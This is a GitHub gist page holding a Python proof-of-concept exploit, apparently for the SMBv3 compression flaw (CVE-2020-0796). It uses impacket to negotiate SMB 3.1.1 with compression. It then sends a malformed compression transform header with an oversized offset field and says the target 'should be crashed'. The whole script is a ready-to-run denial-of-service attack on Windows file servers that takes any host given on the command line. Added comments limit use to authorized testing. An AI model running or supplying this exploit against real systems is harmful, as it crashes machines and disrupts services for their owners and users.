Last active
May 28, 2020 10:28
-
-
Save asolino/45095268f0893bcf08bca3ae68a755b2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python
import argparse | |
import string | |
import sys | |
from impacket import nmb | |
from impacket.smb3 import SMB2_COMPRESSION_TRANSFORM_HEADER, SMB3, SMB2_DIALECT_311, SMB2_NEGOTIATE_SIGNING_REQUIRED, \ | |
SMB2_NEGOTIATE_SIGNING_ENABLED, STATUS_SUCCESS, SMB2_DIALECT_30, \ | |
SMB2_GLOBAL_CAP_ENCRYPTION, SMB2_DIALECT_WILDCARD, SMB2Negotiate_Response, SMB2_NEGOTIATE, \ | |
SMB2Negotiate, SMB311ContextData, SMB2NegotiateContext, SMB2_PREAUTH_INTEGRITY_CAPABILITIES, \ | |
SMB2PreAuthIntegrityCapabilities, \ | |
SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_GLOBAL_CAP_LEASING, SMB2_GLOBAL_CAP_LARGE_MTU, SMB3Packet, \ | |
SMB2_GLOBAL_CAP_DIRECTORY_LEASING, \ | |
SMB2_GLOBAL_CAP_MULTI_CHANNEL, SMB2_GLOBAL_CAP_PERSISTENT_HANDLES, rand, SMB2_COMPRESSION_CAPABILITIES, \ | |
SMB2CompressionCapabilities | |
class MySMB3(SMB3):
    """SMB3 client pinned to dialect 3.1.1 that advertises compression support.

    Overrides ``negotiateSession`` so that a 3.1.1 negotiate request carries two
    negotiate contexts (pre-auth integrity and compression capabilities), and
    adds ``attack``, which sends one hand-built compression transform header.

    NOTE(review): presumably a proof of concept for the SMBv3 compression
    handling flaw (CVE-2020-0796) -- confirm. Only run this against systems
    you are explicitly authorized to test.
    """

    def __init__(self, remote_name, remote_host, my_name=None, host_type=nmb.TYPE_SERVER, sess_port=445, timeout=60,
                 UDP=0, preferredDialect=None, session=None, negSessionResponse=None):
        """Open the connection through ``SMB3.__init__``, always asking for SMB 3.1.1.

        The signature mirrors the parent's so callers can pass the same
        arguments, but ``preferredDialect`` is ignored: ``SMB2_DIALECT_311`` is
        forwarded in its place.
        """
        SMB3.__init__(self, remote_name, remote_host, my_name, host_type, sess_port, timeout, UDP, SMB2_DIALECT_311,
                      session, negSessionResponse)

    def negotiateSession(self, preferredDialect=None, negSessionResponse=None):
        """Negotiate the dialect with the server and cache the result in ``self._Connection``.

        :param preferredDialect: single dialect to offer; when ``None`` the
            request offers SMB 2.0.2, 2.1 and 3.0.
        :param negSessionResponse: an already-received negotiate response; if it
            names a concrete dialect, no new request is sent.
        """
        # Let's store some data for later use
        self._Connection['ClientSecurityMode'] = SMB2_NEGOTIATE_SIGNING_ENABLED
        if self.RequireMessageSigning is True:
            self._Connection['ClientSecurityMode'] |= SMB2_NEGOTIATE_SIGNING_REQUIRED
        self._Connection['Capabilities'] = SMB2_GLOBAL_CAP_ENCRYPTION
        currentDialect = SMB2_DIALECT_WILDCARD

        # Do we have a negSessionPacket already?
        if negSessionResponse is not None:
            # Yes, let's store the dialect answered back
            negResp = SMB2Negotiate_Response(negSessionResponse['Data'])
            currentDialect = negResp['DialectRevision']

        if currentDialect == SMB2_DIALECT_WILDCARD:
            # Still don't know the chosen dialect, let's send our options
            packet = self.SMB_PACKET()
            packet['Command'] = SMB2_NEGOTIATE
            negSession = SMB2Negotiate()

            negSession['SecurityMode'] = self._Connection['ClientSecurityMode']
            negSession['Capabilities'] = self._Connection['Capabilities']
            negSession['ClientGuid'] = self.ClientGuid
            if preferredDialect is not None:
                negSession['Dialects'] = [preferredDialect]
                if preferredDialect == SMB2_DIALECT_311:
                    # Build the Contexts
                    contextData = SMB311ContextData()
                    # NOTE(review): presumably SMB2 header (64) + fixed negotiate
                    # fields + the single dialect/padding -- confirm against MS-SMB2.
                    contextData['NegotiateContextOffset'] = 64 + 38 + 2
                    contextData['NegotiateContextCount'] = 0

                    # Add an SMB2_NEGOTIATE_CONTEXT with ContextType as SMB2_PREAUTH_INTEGRITY_CAPABILITIES
                    # to the negotiate request as specified in section 2.2.3.1:
                    negotiateContext = SMB2NegotiateContext()
                    negotiateContext['ContextType'] = SMB2_PREAUTH_INTEGRITY_CAPABILITIES

                    preAuthIntegrityCapabilities = SMB2PreAuthIntegrityCapabilities()
                    preAuthIntegrityCapabilities['HashAlgorithmCount'] = 1
                    preAuthIntegrityCapabilities['SaltLength'] = 32
                    # Algorithm id 0x0001, little-endian (SHA-512 per MS-SMB2).
                    preAuthIntegrityCapabilities['HashAlgorithms'] = b'\x01\x00'
                    # Salt is SaltLength random ASCII letters.
                    preAuthIntegrityCapabilities['Salt'] = ''.join([rand.choice(string.ascii_letters) for _ in
                                                                    range(preAuthIntegrityCapabilities['SaltLength'])])

                    negotiateContext['Data'] = preAuthIntegrityCapabilities.getData()
                    negotiateContext['DataLength'] = len(negotiateContext['Data'])
                    contextData['NegotiateContextCount'] += 1
                    # NOTE(review): this yields 8 pad bytes, not 0, if DataLength is
                    # already a multiple of 8 -- confirm that cannot happen here.
                    pad = b'\xFF' * (8 - (negotiateContext['DataLength'] % 8))

                    # Second context: advertise compression with one algorithm,
                    # id 0x0001 little-endian (LZNT1 per MS-SMB2).
                    negotiateContext2 = SMB2NegotiateContext()
                    negotiateContext2['ContextType'] = SMB2_COMPRESSION_CAPABILITIES

                    compressionCapabilities = SMB2CompressionCapabilities()
                    compressionCapabilities['CompressionAlgorithmCount'] = 1
                    compressionCapabilities['Padding'] = 0
                    compressionCapabilities['Flags'] = 0
                    compressionCapabilities['CompressionAlgorithms'] = b'\x01\x00'

                    negotiateContext2['Data'] = compressionCapabilities.getData()
                    negotiateContext2['DataLength'] = len(negotiateContext2['Data'])
                    contextData['NegotiateContextCount'] += 1

                    # The context offset/count are carried in the ClientStartTime field.
                    negSession['ClientStartTime'] = contextData.getData()
                    negSession['Padding'] = b'\xFF\xFF'
                    # Subsequent negotiate contexts MUST appear at the first 8-byte aligned offset following the
                    # previous negotiate context.
                    negSession['NegotiateContextList'] = negotiateContext.getData() + pad + negotiateContext2.getData()
            else:
                negSession['Dialects'] = [SMB2_DIALECT_002, SMB2_DIALECT_21, SMB2_DIALECT_30]
            negSession['DialectCount'] = len(negSession['Dialects'])
            packet['Data'] = negSession

            packetID = self.sendSMB(packet)
            ans = self.recvSMB(packetID)
            if ans.isValidAnswer(STATUS_SUCCESS):
                negResp = SMB2Negotiate_Response(ans['Data'])

        # Cache what the server answered; sizes are capped at 0x100000 bytes.
        self._Connection['MaxTransactSize'] = min(0x100000, negResp['MaxTransactSize'])
        self._Connection['MaxReadSize'] = min(0x100000, negResp['MaxReadSize'])
        self._Connection['MaxWriteSize'] = min(0x100000, negResp['MaxWriteSize'])
        self._Connection['ServerGuid'] = negResp['ServerGuid']
        self._Connection['GSSNegotiateToken'] = negResp['Buffer']
        self._Connection['Dialect'] = negResp['DialectRevision']

        # Sign when the server requires it, and always for 3.1.1. (The original
        # repeated the 3.1.1 test in a second, redundant `if`; one check suffices.)
        if (negResp['SecurityMode'] & SMB2_NEGOTIATE_SIGNING_REQUIRED) == SMB2_NEGOTIATE_SIGNING_REQUIRED or \
                self._Connection['Dialect'] == SMB2_DIALECT_311:
            self._Connection['RequireSigning'] = True

        if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LEASING) == SMB2_GLOBAL_CAP_LEASING:
            self._Connection['SupportsFileLeasing'] = True
        if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_LARGE_MTU) == SMB2_GLOBAL_CAP_LARGE_MTU:
            self._Connection['SupportsMultiCredit'] = True

        if self._Connection['Dialect'] >= SMB2_DIALECT_30:
            # Switching to the right packet format
            self.SMB_PACKET = SMB3Packet
            if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_DIRECTORY_LEASING) == SMB2_GLOBAL_CAP_DIRECTORY_LEASING:
                self._Connection['SupportsDirectoryLeasing'] = True
            if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_MULTI_CHANNEL) == SMB2_GLOBAL_CAP_MULTI_CHANNEL:
                self._Connection['SupportsMultiChannel'] = True
            if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_PERSISTENT_HANDLES) == SMB2_GLOBAL_CAP_PERSISTENT_HANDLES:
                self._Connection['SupportsPersistentHandles'] = True
            if (negResp['Capabilities'] & SMB2_GLOBAL_CAP_ENCRYPTION) == SMB2_GLOBAL_CAP_ENCRYPTION:
                self._Connection['SupportsEncryption'] = True

            self._Connection['ServerCapabilities'] = negResp['Capabilities']
            self._Connection['ServerSecurityMode'] = negResp['SecurityMode']

    def attack(self):
        """Send one hand-built compression transform header plus 1024 filler bytes.

        The header is written straight to the NetBIOS session, bypassing the
        normal SMB send path. Returns nothing and does not wait for a reply.
        """
        compressedHeader = SMB2_COMPRESSION_TRANSFORM_HEADER()
        # 0x424D53FC is the little-endian encoding of the bytes FC 'S' 'M' 'B'.
        compressedHeader['ProtocolID'] = 0x424D53FC
        compressedHeader['OriginalCompressedSegmentSize'] = 1024
        compressedHeader['CompressionAlgorithm'] = 1
        compressedHeader['Flags'] = 0xffff
        compressedHeader['Offset_Length'] = 0xffffffff
        self._NetBIOSSession.send_packet(compressedHeader.getData() + b"A" * 1024)
if __name__ == '__main__':
    # Command-line entry point: takes one positional target (name or address),
    # opens a MySMB3 session to it and calls attack() once.
    # Only run this against systems you are explicitly authorized to test.
    parser = argparse.ArgumentParser()
    parser.add_argument('target', action='store', help='<targetName or address>')

    # With no arguments at all, show the full help text instead of argparse's
    # terse usage error.
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    print('Sending attack')
    # The target is passed as both remote_name and remote_host.
    sess = MySMB3(options.target, options.target)
    sess.attack()
    print('Done. Target should be crashed')
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment